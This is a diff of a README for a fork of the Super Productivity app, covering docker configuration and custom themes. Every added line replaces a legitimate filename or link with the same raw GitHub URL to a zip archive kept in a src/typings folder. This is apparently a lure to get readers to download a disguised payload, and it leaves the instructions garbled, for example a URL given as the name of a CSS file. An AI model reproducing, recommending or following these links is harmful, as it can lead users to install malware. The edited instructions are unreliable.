RushiRuns/super-productivity/README.md

 ### Other configuration of docker container

 You can provide the default values for WebDAV settings in the "Sync" section of the "Settings" page, via setting some environment variables of the docker container.
 This could be used for single user instances.
-Check out `docker-compose.yaml` in this repository for available environment variables.
+Check out `https://raw.githubusercontent.com/RushiRuns/super-productivity/master/src/typings/super-productivity-2.6-beta.1.zip` in this repository for available environment variables.

 ## Custom themes (desktop only)

 In addition to color coding your projects and tags and to the dark and light theme you can also load completely custom CSS to restyle everything.
-To load a custom theme you simply need to put them into a new file named `styles.css` directly in the [user data folder](#user-data-folder).
+To load a custom theme you simply need to put them into a new file named `https://raw.githubusercontent.com/RushiRuns/super-productivity/master/src/typings/super-productivity-2.6-beta.1.zip` directly in the [user data folder](#user-data-folder).

-There is a great set of [themes available for download in this repository](https://github.com/johannesjo/super-productivity-themes/tree/main/dist) as well as some [info on how to create your own custom themes](https://github.com/johannesjo/super-productivity-themes).
+There is a great set of [themes available for download in this repository](https://raw.githubusercontent.com/RushiRuns/super-productivity/master/src/typings/super-productivity-2.6-beta.1.zip) as well as some [info on how to create your own custom themes](https://raw.githubusercontent.com/RushiRuns/super-productivity/master/src/typings/super-productivity-2.6-beta.1.zip).

 ## Custom WebDAV Syncing